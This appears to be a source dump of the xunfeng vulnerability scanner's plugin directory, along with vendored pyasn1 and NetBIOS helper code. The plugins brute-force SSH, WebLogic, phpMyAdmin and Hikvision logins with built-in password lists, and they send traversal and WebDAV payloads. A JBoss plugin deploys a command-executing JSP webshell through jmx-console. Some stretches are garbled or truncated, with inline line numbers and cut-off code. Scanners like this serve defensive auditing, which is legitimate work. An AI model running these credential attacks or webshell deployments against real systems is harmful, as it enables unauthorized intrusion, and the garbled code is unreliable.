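    """Plugin metadata read by the scanner framework (display name, severity, asset keyword)."""
    plugin_info = {
        "name": "SSH弱口令",
        "info": "直接导致服务器被入侵控制。",
        "level": "紧急",
        "type": "弱口令",
        "author": "wolf@YSRC",
        "url": "",
        "keyword": "server:ssh",
        "source": 1
    }
    return plugin_info


def check(ip, port, timeout):
    """Try a few common SSH users against every entry of PASSWORD_DIC.

    PASSWORD_DIC is not defined in this file; presumably the plugin loader injects it into the
    module namespace (confirm). '{user}' inside a dictionary entry is replaced by the user name.

    Returns a finding string (with the plaintext credential, so the scan result store holds
    live secrets) on the first successful login, None otherwise.
    """
    user_list = ['root', 'admin', 'oracle', 'weblogic']
    for user in user_list:
        for pass_ in PASSWORD_DIC:
            pass_ = str(pass_.replace('{user}', user))
            # One client per attempt: the original reused a single client and closed it only on
            # success, so the transport of every failed attempt was left open.
            ssh = paramiko.SSHClient()
            # The scanner has no trust store for targets; auto-accepting host keys is expected here.
            ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
            try:
                # allow_agent/look_for_keys off: otherwise paramiko also offers the scanner's own
                # agent keys and ~/.ssh keys to every target, which leaks the operator's key
                # identities and can report a key-based login as a "weak password" hit.
                ssh.connect(ip, port, user, pass_, timeout=timeout,
                            allow_agent=False, look_for_keys=False)
                # A successful connect() already proves the credential; the 'whoami' is kept for
                # parity with the original plugin but leaves a command-execution trace on the target.
                ssh.exec_command('whoami')
                if pass_ == '': pass_ = "null"
                return u"存在弱口令,账号:%s,密码:%s" % (user, pass_)
            except Exception, e:
                # Stop early when the port is unreachable instead of burning the whole dictionary.
                # The original tested `"Errno 61" in e`, which iterates e.args (holding the int 61,
                # never that string) and so only ever matched socket.timeout's bare "timed out";
                # errno 61 is also macOS-specific. Newer paramiko wraps refused connects in
                # NoValidConnectionsError with errno None, hence the class-name check.
                msg = str(e)
                if getattr(e, 'errno', None) == errno.ECONNREFUSED \
                        or e.__class__.__name__ == 'NoValidConnectionsError' \
                        or "timed out" in msg or "Connection refused" in msg:
                    return
            finally:
                ssh.close()

-------------------------------------------------------------------------------- /server/vulscan/vuldb/crack_weblogic.py: --------------------------------------------------------------------------------
#coding:utf-8
import urllib2
def get_plugin_info():
    plugin_info = {
        "name": "Weblogic弱口令",
        "info": "攻击者通过此漏洞可以登陆管理控制台,通过部署功能可直接获取服务器权限。",
        "level": "高危",
        "type": "弱口令",
        "author": "wolf@YSRC",
        "url": "http://jingyan.baidu.com/article/c74d6000650d470f6b595d72.html",
        "keyword": "tag:weblogic",
        "source": 1
    }
    return plugin_info
def check(host,port,timeout):
    url = "http://%s:%d"%(host,int(port))
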
error_i=0 18 | flag_list=['WebLogic Server Console','javascript/console-help.js','WebLogic Server Administration Console Home','/console/console.portal','console/jsp/common/warnuserlockheld.jsp','/console/actions/common/'] 19 | user_list=['weblogic'] 20 | pass_list=['weblogic','password','Weblogic1','weblogic10','weblogic10g','weblogic11','weblogic11g','weblogic12','weblogic12g','weblogic13','weblogic13g','weblogic123','123456','12345678','123456789','admin123','admin888','admin1','administrator','8888888','123123','admin','manager','root'] 21 | opener = urllib2.build_opener(urllib2.HTTPCookieProcessor()) 22 | for user in user_list: 23 | for password in pass_list: 24 | try: 25 | PostStr='j_username=%s&j_password=%s&j_character_encoding=UTF-8'%(user,password) 26 | request = opener.open(url+'/console/j_security_check',PostStr,timeout=timeout) 27 | res_html = request.read() 28 | except urllib2.HTTPError,e: 29 | return 30 | except urllib2.URLError,e: 31 | error_i+=1 32 | if error_i >= 3: 33 | return 34 | continue 35 | for flag in flag_list: 36 | if flag in res_html: 37 | info = u'%s/console 账号:%s,密码:%s'%(url,user,password) 38 | return info -------------------------------------------------------------------------------- /server/vulscan/vuldb/git_index_disclosure.json: -------------------------------------------------------------------------------- 1 | { 2 | "name": ".git代码泄露", 3 | "info": "未删除.git目录导致源代码信息泄露", 4 | "level": "中危", 5 | "type": "信息泄露", 6 | "author": "0xbug", 7 | "url": "https://github.com/git/git/blob/master/Documentation/technical/index-format.txt", 8 | "keyword": "server:web", 9 | "source": 1, 10 | "plugin": { 11 | "url": "/.git/config", 12 | "tag": "存在/.git/目录", 13 | "analyzing": "keyword", 14 | "analyzingdata": "repositoryformatversion", 15 | "data": "", 16 | "method": "GET" 17 | } 18 | } 19 | -------------------------------------------------------------------------------- /server/vulscan/vuldb/glassfish_filread.json: 
-------------------------------------------------------------------------------- 1 | { 2 | "name" : "Glassfish任意文件读取", 3 | "info" : "可读取服务器上的任意文件", 4 | "level" : "高危", 5 | "type" : "文件读取", 6 | "author" : "wolf@YSRC", 7 | "url": "http://bobao.360.cn/learning/detail/2564.html", 8 | "keyword" : "tag:glassfish", 9 | "source" : 1, 10 | "plugin" : { 11 | "url" : "/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/", 12 | "tag" : "存在任意文件读取漏洞", 13 | "analyzing" : "keyword", 14 | "analyzingdata" : "package-appclient.xml", 15 | "data" : "", 16 | "method" : "GET" 17 | } 18 | } -------------------------------------------------------------------------------- /server/vulscan/vuldb/hikvision_crackpass.py: -------------------------------------------------------------------------------- 1 | # coding:utf-8 2 | import urllib2 3 | import base64 4 | 5 | 6 | def get_plugin_info(): 7 | plugin_info = { 8 | "name": "海康威视摄像头弱口令", 9 | "info": "攻击者可进入web控制台,进而接管控制设备。", 10 | "level": "高危", 11 | "type": "弱口令", 12 | "author": "wolf@YSRC", 13 | "url": "", 14 | "keyword": "tag:hikvision", 15 | "source": 1 16 | } 17 | return plugin_info 18 | 19 | 20 | def check(ip, port, timeout): 21 | error_i = 0 22 | flag_list = ['>true= 3: return 41 | continue 42 | if int(res_code) == 404 or int(res_code) == 403: return 43 | if int(res_code) == 401: continue 44 | for flag in flag_list: 45 | if flag in res_html: 46 | return u'Hikvision网络摄像头弱口令 %s:%s' % (user, password) 47 | -------------------------------------------------------------------------------- /server/vulscan/vuldb/iis_shortfile.py: -------------------------------------------------------------------------------- 1 | # coding:utf-8 2 | import urllib2 3 | 4 | 5 | def get_plugin_info(): 6 | plugin_info = { 7 | "name": "IIS短文件名", 8 | "info": "攻击者可利用此特性猜解出目录与文件名,以达到类似列目录漏洞的效果。", 9 | "level": "低危", 10 | "type": "信息泄露", 11 | "author": "wolf@YSRC", 12 | "url": "", 13 | "keyword": "tag:iis", 14 | "source": 1 15 | } 16 | return plugin_info 17 | 
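def check(ip, port, timeout):
    """IIS short-name (8.3 "~1" tilde) enumeration check.

    A vulnerable IIS distinguishes a tilde pattern that matches nothing (400) from one that
    matches an existing short name (404); a patched server answers both the same way.
    Returns the finding string or None.
    """
    try:
        base = 'http://' + ip + ":" + str(port)
        # Prefix that should not exist on the target -> expected 400 on a vulnerable host.
        flag_400 = '/otua*~1.*/.aspx'
        # Wildcard that matches any short name -> expected 404 on a vulnerable host.
        flag_404 = '/*~1.*/.aspx'
        if _status(base + flag_400, timeout) == 400:
            if _status(base + flag_404, timeout) == 404:
                return u'iis 短文件名猜解漏洞'
    except Exception, e:
        # Plugin contract used throughout vuldb: "no finding" is signalled by returning None.
        pass


def _status(url, timeout):
    """Return the HTTP status code of a GET on url, whether or not urllib2 raised for it.

    urllib2.urlopen raises HTTPError for 4xx/5xx by default (the sibling plugins catch it and
    read e.code), so the original `if int(req.code) == 400` could only run on a 2xx reply: both
    probes raised, the bare except swallowed them, and the plugin never reported anything.
    """
    try:
        return int(urllib2.urlopen(urllib2.Request(url), timeout=timeout).code)
    except urllib2.HTTPError, e:
        return int(e.code)

-------------------------------------------------------------------------------- /server/vulscan/vuldb/iis_webdav.py: --------------------------------------------------------------------------------
# coding=utf-8
import socket
import time
import urllib2


def get_plugin_info():
    """Plugin metadata read by the scanner framework (display name, severity, asset keyword)."""
    plugin_info = {
        "name": "IIS WebDav",
        "info": "开启了WebDav且配置不当可导致攻击者直接上传webshell,进而导致服务器被入侵控制。",
        "level": "紧急",
        "type": "任意文件上传",
        "author": "wolf@YSRC",
        "url": "",
        "keyword": "tag:iis",
        "source": 1
    }
    return plugin_info


def check(ip, port, timeout):
    """Probe for a writable WebDAV root by PUTting a marker file and reading it back over HTTP.

    Side effect on the target: this writes /vultest.txt (content "xxscan0") and never removes
    it -- no DAV DELETE is attempted -- so clean-up is left to the operator. Returns the finding
    string when the marker is readable afterwards, None otherwise.
    """
    port = int(port)  # sibling plugins receive the port as a string; the %d below needs an int
    s = None
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        # Per-socket timeout instead of socket.setdefaulttimeout(), which is process-global and
        # silently changes the timeout of every socket other plugins create afterwards.
        s.settimeout(timeout)
        s.connect((ip, port))
        # Raw PUT; Content-Length 9 covers "xxscan0\r\n", the trailing CRLF is padding.
        flag = "PUT /vultest.txt HTTP/1.1\r\nHost: %s:%d\r\nContent-Length: 9\r\n\r\nxxscan0\r\n\r\n" % (ip, port)
        s.send(flag)
        time.sleep(1)
        data = s.recv(1024)
        s.close()
        s = None
        # Cheap pre-filter only: 'PUT' also appears in the Allow: header of a 405, so the
        # read-back below is what actually confirms the write succeeded.
        if 'PUT' in data:
            url = 'http://' + ip + ":" + str(port) + '/vultest.txt'
            request = urllib2.Request(url)
            res_html = urllib2.urlopen(request, timeout=timeout).read(204800)
            if 'xxscan0' in res_html:
                return u"iis webdav漏洞"
    except Exception, e:
        # Plugin contract used throughout vuldb: "no finding" is signalled by returning None.
        pass
    finally:
        if s is not None:
            s.close()

-------------------------------------------------------------------------------- /server/vulscan/vuldb/iis_webdav_rce.py: --------------------------------------------------------------------------------
# coding=utf-8
import socket
import time


def get_plugin_info():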
| plugin_info = { 8 | "name": "IIS WebDav RCE", 9 | "info": "CVE-2017-7269,Windows Server 2003R2版本IIS6.0的WebDAV服务中的ScStoragePathFromUrl函数存在缓存区溢出漏洞,远程攻击者通过以“If: <% %>
 <% if (request.getParameter("comment") != null) { out.println("Command: " + request.getParameter("comment") + "
"); Process p = Runtime.getRuntime().exec(request.getParameter("comment")); OutputStream os = p.getOutputStream(); InputStream in = p.getInputStream(); DataInputStream dis = new DataInputStream(in); String disr = dis.readLine(); while ( disr != null ) { out.println(disr); disr = dis.readLine(); } } %>
""" 36 | # s1.recv(1024) 37 | shellcode = "" 38 | name = random_str(5) 39 | for v in shell: 40 | shellcode += hex(ord(v)).replace("0x", "%") 41 | flag = "HEAD /jmx-console/HtmlAdaptor?action=invokeOpByName&name=jboss.admin%3Aservice%3DDeploymentFileRepository&methodName=store&argType=" + \ 42 | "java.lang.String&arg0=%s.war&argType=java.lang.String&arg1=xunfeng&argType=java.lang.String&arg2=.jsp&argType=java.lang.String&arg3=" % ( 43 | name) + shellcode + \ 44 | "&argType=boolean&arg4=True HTTP/1.0\r\n\r\n" 45 | s1.send(flag) 46 | data = s1.recv(512) 47 | s1.close() 48 | time.sleep(10) 49 | url = "http://%s:%d" % (host, int(port)) 50 | webshell_url = "%s/%s/xunfeng.jsp" % (url, name) 51 | res = urllib2.urlopen(webshell_url, timeout=timeout) 52 | if 'comments' in res.read(): 53 | info = u"Jboss Authentication bypass webshell:%s" % (webshell_url) 54 | return info 55 | except Exception, e: 56 | pass 57 | -------------------------------------------------------------------------------- /server/vulscan/vuldb/jboss_info.json: -------------------------------------------------------------------------------- 1 | { 2 | "info" : "信息泄露", 3 | "name" : "Jboss信息泄露", 4 | "level" : "低危", 5 | "type" : "信息泄露", 6 | "author" : "wolf@YSRC", 7 | "url": "", 8 | "keyword" : "tag:jboss", 9 | "source" : 1, 10 | "plugin" : { 11 | "url" : "/status?full=true", 12 | "tag" : "存在信息泄露漏洞", 13 | "analyzing" : "keyword", 14 | "analyzingdata" : "Max processing time", 15 | "data" : "", 16 | "method" : "GET" 17 | } 18 | } -------------------------------------------------------------------------------- /server/vulscan/vuldb/jenkins_unauth.json: -------------------------------------------------------------------------------- 1 | { 2 | "name" : "Jenkins代码执行", 3 | "info" : "Jenkins未授权访问,攻击者可利用此漏洞执行系统命令", 4 | "level" : "紧急", 5 | "type" : "代码执行", 6 | "author" : "wolf@YSRC", 7 | "url": "", 8 | "keyword" : "tag:jenkins", 9 | "source" : 1, 10 | "plugin" : { 11 | "url" : "/", 12 | "tag" : "Jenkins /Script 代码执行", 13 
| "analyzing" : "keyword", 14 | "analyzingdata" : "task-link", 15 | "data" : "", 16 | "method" : "GET" 17 | } 18 | } -------------------------------------------------------------------------------- /server/vulscan/vuldb/jetty_refer.py: -------------------------------------------------------------------------------- 1 | # coding=utf-8 2 | import socket 3 | 4 | 5 | def get_plugin_info(): 6 | plugin_info = { 7 | "name": "Jetty 共享缓存区远程泄露", 8 | "info": "攻击者可利用此漏洞获取其他用户的请求信息,进而获取其权限", 9 | "level": "中危", 10 | "type": "信息泄露", 11 | "author": "wolf@YSRC", 12 | "url": "https://www.secpulse.com/archives/4911.html", 13 | "keyword": "tag:jetty", 14 | "source": 1 15 | } 16 | return plugin_info 17 | 18 | 19 | def check(ip, port, timeout): 20 | try: 21 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 22 | s.settimeout(timeout) 23 | s.connect((ip, int(port))) 24 | flag = "GET / HTTP/1.1\r\nReferer:%s\r\n\r\n" % (chr(0) * 15) 25 | s.send(flag) 26 | data = s.recv(512) 27 | s.close() 28 | if 'state=HEADER_VALUE' in data and '400' in data: 29 | return u"jetty 共享缓存区远程泄露漏洞" 30 | except: 31 | pass 32 | -------------------------------------------------------------------------------- /server/vulscan/vuldb/memcache_unauth.py: -------------------------------------------------------------------------------- 1 | # coding:utf-8 2 | import socket 3 | 4 | 5 | def get_plugin_info(): 6 | plugin_info = { 7 | "name": "Memcache未授权访问", 8 | "info": "导致数据库敏感信息泄露。", 9 | "level": "中危", 10 | "type": "未授权访问", 11 | "author": "wolf@YSRC", 12 | "url": "", 13 | "keyword": "server:memcache", 14 | "source": 1 15 | } 16 | return plugin_info 17 | 18 | 19 | def check(ip, port, timeout): 20 | try: 21 | socket.setdefaulttimeout(timeout) 22 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 23 | s.connect((ip, int(port))) 24 | s.send("stats\r\n") 25 | result = s.recv(1024) 26 | if "STAT version" in result: 27 | return u"未授权访问" 28 | except Exception, e: 29 | pass 30 | 
-------------------------------------------------------------------------------- /server/vulscan/vuldb/netgear_passwd.json: -------------------------------------------------------------------------------- 1 | {"info": "NETGEAR\u8def\u7531\u5668\u591a\u4e2a\u7cfb\u5217\u5b58\u5728\u5bc6\u7801\u6cc4\u9732\u6f0f\u6d1e\uff08CVE-2017-5521\uff09", "source": 1, "name": "Netgear\u5bc6\u7801\u6cc4\u9732", "keyword": "banner:NETGEAR", "level": "\u9ad8\u5371", "url": "https://www.seebug.org/vuldb/ssvid-92639", "author": "wolf@YSRC", "type": "\u4fe1\u606f\u6cc4\u9732", "plugin": {"url": "/passwordrecovered.cgi?id=get_rekt", "tag": "\u6f0f\u6d1eURL\uff1a/passwordrecovered.cgi?id=get_rekt", "analyzing": "keyword", "analyzingdata": "class=\"MNUText\" align=\"left\">", "data": "", "method": "GET"}} -------------------------------------------------------------------------------- /server/vulscan/vuldb/nmb/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/superhuahua/xunfengES/427ec1d56b602e6eebe24c51502a23628e5ca5e8/server/vulscan/vuldb/nmb/__init__.py -------------------------------------------------------------------------------- /server/vulscan/vuldb/nmb/nmb_constants.py: -------------------------------------------------------------------------------- 1 | 2 | # Default port for NetBIOS name service 3 | NETBIOS_NS_PORT = 137 4 | 5 | # Default port for NetBIOS session service 6 | NETBIOS_SESSION_PORT = 139 7 | 8 | # Owner Node Type Constants 9 | NODE_B = 0x00 10 | NODE_P = 0x01 11 | NODE_M = 0x10 12 | NODE_RESERVED = 0x11 13 | 14 | # Name Type Constants 15 | TYPE_UNKNOWN = 0x01 16 | TYPE_WORKSTATION = 0x00 17 | TYPE_CLIENT = 0x03 18 | TYPE_SERVER = 0x20 19 | TYPE_DOMAIN_MASTER = 0x1B 20 | TYPE_MASTER_BROWSER = 0x1D 21 | TYPE_BROWSER = 0x1E 22 | 23 | TYPE_NAMES = { TYPE_UNKNOWN: 'Unknown', 24 | TYPE_WORKSTATION: 'Workstation', 25 | TYPE_CLIENT: 'Client', 26 | TYPE_SERVER: 'Server', 27 | 
TYPE_MASTER_BROWSER: 'Master Browser', 28 | TYPE_BROWSER: 'Browser Server', 29 | TYPE_DOMAIN_MASTER: 'Domain Master' 30 | } 31 | 32 | # Values for Session Packet Type field in Session Packets 33 | SESSION_MESSAGE = 0x00 34 | SESSION_REQUEST = 0x81 35 | POSITIVE_SESSION_RESPONSE = 0x82 36 | NEGATIVE_SESSION_RESPONSE = 0x83 37 | REGTARGET_SESSION_RESPONSE = 0x84 38 | SESSION_KEEPALIVE = 0x85 39 | -------------------------------------------------------------------------------- /server/vulscan/vuldb/nmb/nmb_structs.py: -------------------------------------------------------------------------------- 1 | 2 | import struct 3 | 4 | class NMBError(Exception): pass 5 | 6 | 7 | class NotConnectedError(NMBError): 8 | """ 9 | Raisd when the underlying NMB connection has been disconnected or not connected yet 10 | """ 11 | pass 12 | 13 | 14 | class NMBSessionMessage: 15 | 16 | HEADER_STRUCT_FORMAT = '>BBH' 17 | HEADER_STRUCT_SIZE = struct.calcsize(HEADER_STRUCT_FORMAT) 18 | 19 | def __init__(self): 20 | self.reset() 21 | 22 | def reset(self): 23 | self.type = 0 24 | self.flags = 0 25 | self.data = '' 26 | 27 | def decode(self, data, offset): 28 | data_len = len(data) 29 | 30 | if data_len < offset + self.HEADER_STRUCT_SIZE: 31 | # Not enough data for decoding 32 | return 0 33 | 34 | self.reset() 35 | self.type, self.flags, length = struct.unpack(self.HEADER_STRUCT_FORMAT, data[offset:offset+self.HEADER_STRUCT_SIZE]) 36 | 37 | if self.flags & 0x01: 38 | length |= 0x010000 39 | 40 | if data_len < offset + self.HEADER_STRUCT_SIZE + length: 41 | return 0 42 | 43 | self.data = data[offset+self.HEADER_STRUCT_SIZE:offset+self.HEADER_STRUCT_SIZE+length] 44 | return self.HEADER_STRUCT_SIZE + length 45 | 46 | 47 | class DirectTCPSessionMessage(NMBSessionMessage): 48 | 49 | HEADER_STRUCT_FORMAT = '>I' 50 | HEADER_STRUCT_SIZE = struct.calcsize(HEADER_STRUCT_FORMAT) 51 | 52 | def decode(self, data, offset): 53 | data_len = len(data) 54 | 55 | if data_len < offset + self.HEADER_STRUCT_SIZE: 
56 | # Not enough data for decoding 57 | return 0 58 | 59 | self.reset() 60 | length = struct.unpack(self.HEADER_STRUCT_FORMAT, data[offset:offset+self.HEADER_STRUCT_SIZE])[0] 61 | 62 | if length >> 24 != 0: 63 | raise NMBError("Invalid protocol header for Direct TCP session message") 64 | 65 | if data_len < offset + self.HEADER_STRUCT_SIZE + length: 66 | return 0 67 | 68 | self.data = data[offset+self.HEADER_STRUCT_SIZE:offset+self.HEADER_STRUCT_SIZE+length] 69 | return self.HEADER_STRUCT_SIZE + length 70 | -------------------------------------------------------------------------------- /server/vulscan/vuldb/nmb/utils.py: -------------------------------------------------------------------------------- 1 | 2 | import string, re 3 | 4 | 5 | def encode_name(name, type, scope = None): 6 | """ 7 | Perform first and second level encoding of name as specified in RFC 1001 (Section 4) 8 | """ 9 | if name == '*': 10 | name = name + '\0' * 15 11 | elif len(name) > 15: 12 | name = name[:15] + chr(type) 13 | else: 14 | name = string.ljust(name, 15) + chr(type) 15 | 16 | def _do_first_level_encoding(m): 17 | s = ord(m.group(0)) 18 | return string.uppercase[s >> 4] + string.uppercase[s & 0x0f] 19 | 20 | encoded_name = chr(len(name) * 2) + re.sub('.', _do_first_level_encoding, name) 21 | if scope: 22 | encoded_scope = '' 23 | for s in string.split(scope, '.'): 24 | encoded_scope = encoded_scope + chr(len(s)) + s 25 | return encoded_name + encoded_scope + '\0' 26 | else: 27 | return encoded_name + '\0' 28 | 29 | 30 | def decode_name(name): 31 | name_length = ord(name[0]) 32 | assert name_length == 32 33 | 34 | def _do_first_level_decoding(m): 35 | s = m.group(0) 36 | return chr(((ord(s[0]) - ord('A')) << 4) | (ord(s[1]) - ord('A'))) 37 | 38 | decoded_name = re.sub('..', _do_first_level_decoding, name[1:33]) 39 | if name[33] == '\0': 40 | return 34, decoded_name, '' 41 | else: 42 | decoded_domain = '' 43 | offset = 34 44 | while 1: 45 | domain_length = ord(name[offset]) 46 | if 
domain_length == 0: 47 | break 48 | decoded_domain = '.' + name[offset:offset + domain_length] 49 | offset = offset + domain_length 50 | return offset + 1, decoded_name, decoded_domain 51 | -------------------------------------------------------------------------------- /server/vulscan/vuldb/phpmyadmin_crackpass.py: -------------------------------------------------------------------------------- 1 | # coding=utf-8 2 | import urllib2 3 | import re 4 | 5 | def get_plugin_info(): 6 | plugin_info = { 7 | "name": "phpMyAdmin弱口令", 8 | "info": "导致数据库敏感信息泄露,严重可导致服务器被入侵控制。", 9 | "level": "高危", 10 | "type": "弱口令", 11 | "author": "wolf@YSRC", 12 | "url": "", 13 | "keyword": "tag:phpmyadmin", 14 | "source": 1 15 | } 16 | return plugin_info 17 | 18 | 19 | def check(ip, port, timeout): 20 | flag_list = ['src="navigation.php', 'frameborder="0" id="frame_content"', 'id="li_server_type">', 21 | 'class="disableAjax" title='] 22 | user_list = ['root', 'mysql', 'www', 'bbs', 'wwwroot', 'bak', 'backup'] 23 | error_i = 0 24 | try: 25 | res_html = urllib2.urlopen('http://' + ip + ":" + str(port), timeout=timeout).read() 26 | if 'input_password' in res_html and 'name="token"' in res_html: 27 | url = 'http://' + ip + ":" + str(port) + "/index.php" 28 | else: 29 | res_html = urllib2.urlopen('http://' + ip + ":" + str(port) + "/phpmyadmin", timeout=timeout).read() 30 | if 'input_password' in res_html and 'name="token"' in res_html: 31 | url = 'http://' + ip + ":" + str(port) + "/phpmyadmin/index.php" 32 | else: 33 | return 34 | except: 35 | pass 36 | for user in user_list: 37 | for password in PASSWORD_DIC: 38 | try: 39 | opener = urllib2.build_opener(urllib2.HTTPCookieProcessor()) 40 | res_html = opener.open(url, timeout=timeout).read() 41 | token = re.search('name="token" value="(.*?)" />', res_html) 42 | token_hash = urllib2.quote(token.group(1)) 43 | postdata = "pma_username=%s&pma_password=%s&server=1&target=index.php&lang=zh_CN&collation_connection=utf8_general_ci&token=%s" % ( 44 | 
user, password, token_hash) 45 | res = opener.open(url,postdata, timeout=timeout) 46 | res_html = res.read() 47 | for flag in flag_list: 48 | if flag in res_html: 49 | return u'phpmyadmin弱口令,账号:%s 密码:%s' % (user, password) 50 | except urllib2.URLError, e: 51 | error_i += 1 52 | if error_i >= 3: return 53 | except Exception,e: 54 | return -------------------------------------------------------------------------------- /server/vulscan/vuldb/pyasn1/__init__.py: -------------------------------------------------------------------------------- 1 | import sys 2 | 3 | # http://www.python.org/dev/peps/pep-0396/ 4 | __version__ = '0.1.9' 5 | 6 | if sys.version_info[:2] < (2, 4): 7 | raise RuntimeError('PyASN1 requires Python 2.4 or later') 8 | 9 | -------------------------------------------------------------------------------- /server/vulscan/vuldb/pyasn1/codec/__init__.py: -------------------------------------------------------------------------------- 1 | # This file is necessary to make this directory a package. 2 | -------------------------------------------------------------------------------- /server/vulscan/vuldb/pyasn1/codec/ber/__init__.py: -------------------------------------------------------------------------------- 1 | # This file is necessary to make this directory a package. 
# ==== /server/vulscan/vuldb/pyasn1/codec/ber/eoo.py ====
# Vendored pyasn1 0.1.9: BER end-of-octets marker (universal tag 0).
from pyasn1.type import base, tag

class EndOfOctets(base.AbstractSimpleAsn1Item):
    defaultValue = 0
    tagSet = tag.initTagSet(
        tag.Tag(tag.tagClassUniversal, tag.tagFormatSimple, 0x00)
    )
# Shared singleton used by the BER decoder.
endOfOctets = EndOfOctets()

# ==== /server/vulscan/vuldb/pyasn1/codec/cer/__init__.py ====
# This file is necessary to make this directory a package.

# ==== /server/vulscan/vuldb/pyasn1/codec/cer/decoder.py ====
# CER decoder
from pyasn1.type import univ
from pyasn1.codec.ber import decoder
from pyasn1.compat.octets import oct2int
from pyasn1 import error

class BooleanDecoder(decoder.AbstractSimpleDecoder):
    # Stricter than BER: exactly one octet, and only 0xFF / 0x00 are accepted.
    protoComponent = univ.Boolean(0)
    def valueDecoder(self, fullSubstrate, substrate, asn1Spec, tagSet, length,
                     state, decodeFun, substrateFun):
        head, tail = substrate[:length], substrate[length:]
        if not head or length != 1:
            raise error.PyAsn1Error('Not single-octet Boolean payload')
        byte = oct2int(head[0])
        # CER/DER specifies encoding of TRUE as 0xFF and FALSE as 0x0, while
        # BER allows any non-zero value as TRUE; cf. sections 8.2.2. and 11.1
        # in http://www.itu.int/ITU-T/studygroups/com17/languages/X.690-0207.pdf
        if byte == 0xff:
            value = 1
        elif byte == 0x00:
            value = 0
        else:
            raise error.PyAsn1Error('Unexpected Boolean payload: %s' % byte)
        return self._createComponent(asn1Spec, tagSet, value), tail

# Start from the BER tag map and override only Boolean.
tagMap = decoder.tagMap.copy()
tagMap.update({
    univ.Boolean.tagSet: BooleanDecoder()
})

typeMap = decoder.typeMap

class Decoder(decoder.Decoder): pass

decode = Decoder(tagMap, decoder.typeMap)

# ==== /server/vulscan/vuldb/pyasn1/codec/der/__init__.py ====
# This file is necessary to make this directory a package.

# ==== /server/vulscan/vuldb/pyasn1/codec/der/decoder.py ====
# DER decoder
from pyasn1.codec.cer import decoder

tagMap = decoder.tagMap
typeMap = decoder.typeMap
class Decoder(decoder.Decoder):
    # DER never uses indefinite-length encoding.
    supportIndefLength = False

decode = Decoder(tagMap, typeMap)

# ==== /server/vulscan/vuldb/pyasn1/codec/der/encoder.py ====
# DER encoder
from pyasn1.type import univ
from pyasn1.codec.cer import encoder
from pyasn1 import error

class SetOfEncoder(encoder.SetOfEncoder):
    # Orders SET OF components by tag (Choice components by their effective tag).
    # Note: `cmp` is a Python 2 builtin; this module is Python 2 only as written.
    def _cmpSetComponents(self, c1, c2):
        tagSet1 = isinstance(c1, univ.Choice) and \
                  c1.getEffectiveTagSet() or c1.getTagSet()
        tagSet2 = isinstance(c2, univ.Choice) and \
                  c2.getEffectiveTagSet() or c2.getTagSet()
        return cmp(tagSet1, tagSet2)

tagMap = encoder.tagMap.copy()
tagMap.update({
    # Overload CER encoders with BER ones (a bit hackerish XXX)
    univ.BitString.tagSet: encoder.encoder.BitStringEncoder(),
    univ.OctetString.tagSet: encoder.encoder.OctetStringEncoder(),
    # Set & SetOf have same tags
    univ.SetOf().tagSet: SetOfEncoder()
})

typeMap = encoder.typeMap

class Encoder(encoder.Encoder):
    supportIndefLength = False
    def __call__(self, client, defMode=True, maxChunkSize=0):
        # Reject a caller asking for indefinite-length output.
        if not defMode:
            raise error.PyAsn1Error('DER forbids indefinite length mode')
        return encoder.Encoder.__call__(self, client, defMode, maxChunkSize)

encode = Encoder(tagMap, typeMap)

# ==== /server/vulscan/vuldb/pyasn1/compat/__init__.py ====
# This file is necessary to make this directory a package.

# ==== /server/vulscan/vuldb/pyasn1/compat/binary.py ====
from sys import version_info

# Backfill the bin() builtin on Python < 2.6.
if version_info[0:2] < (2, 6):
    def bin(x):
        if x <= 1:
            return '0b'+str(x)
        else:
            return bin(x>>1) + str(x&1)
else:
    bin = bin

# ==== /server/vulscan/vuldb/pyasn1/compat/octets.py ====
from sys import version_info

# Byte/str helpers that hide the Python 2 (str) vs Python 3 (bytes) split.
if version_info[0] <= 2:
    int2oct = chr
    ints2octs = lambda s: ''.join([ int2oct(x) for x in s ])
    null = ''
    oct2int = ord
    octs2ints = lambda s: [ oct2int(x) for x in s ]
    str2octs = lambda x: x
    octs2str = lambda x: x
    isOctetsType = lambda s: isinstance(s, str)
    isStringType = lambda s: isinstance(s, (str, unicode))
else:
    ints2octs = bytes
    int2oct = lambda x: ints2octs((x,))
    null = ints2octs()
    oct2int = lambda x: x
    octs2ints = lambda s: [ x for x in s ]
    str2octs = lambda x: x.encode()
    octs2str = lambda x: x.decode()
    isOctetsType = lambda s: isinstance(s, bytes)
    isStringType = lambda s: isinstance(s, str)

# ==== /server/vulscan/vuldb/pyasn1/error.py ====
# Exception hierarchy shared by all pyasn1 modules.
class PyAsn1Error(Exception): pass
class ValueConstraintError(PyAsn1Error): pass
class SubstrateUnderrunError(PyAsn1Error): pass

# ==== /server/vulscan/vuldb/pyasn1/type/__init__.py ====
# This file is necessary to make this directory a package.

# ==== /server/vulscan/vuldb/pyasn1/type/char.py ====
# ASN.1 "character string" types
# Each is an OctetString with an implicit universal tag; a few declare the
# codec to use for text conversion.
from pyasn1.type import univ, tag

class NumericString(univ.OctetString):
    tagSet = univ.OctetString.tagSet.tagImplicitly(
        tag.Tag(tag.tagClassUniversal, tag.tagFormatSimple, 18)
    )

class PrintableString(univ.OctetString):
    tagSet = univ.OctetString.tagSet.tagImplicitly(
        tag.Tag(tag.tagClassUniversal, tag.tagFormatSimple, 19)
    )

class TeletexString(univ.OctetString):
    tagSet = univ.OctetString.tagSet.tagImplicitly(
        tag.Tag(tag.tagClassUniversal, tag.tagFormatSimple, 20)
    )

class T61String(TeletexString): pass

class VideotexString(univ.OctetString):
    tagSet = univ.OctetString.tagSet.tagImplicitly(
        tag.Tag(tag.tagClassUniversal, tag.tagFormatSimple, 21)
    )

class IA5String(univ.OctetString):
    tagSet = univ.OctetString.tagSet.tagImplicitly(
        tag.Tag(tag.tagClassUniversal, tag.tagFormatSimple, 22)
    )

class GraphicString(univ.OctetString):
    tagSet = univ.OctetString.tagSet.tagImplicitly(
        tag.Tag(tag.tagClassUniversal, tag.tagFormatSimple, 25)
    )

class VisibleString(univ.OctetString):
    tagSet = univ.OctetString.tagSet.tagImplicitly(
        tag.Tag(tag.tagClassUniversal, tag.tagFormatSimple, 26)
    )

class ISO646String(VisibleString): pass

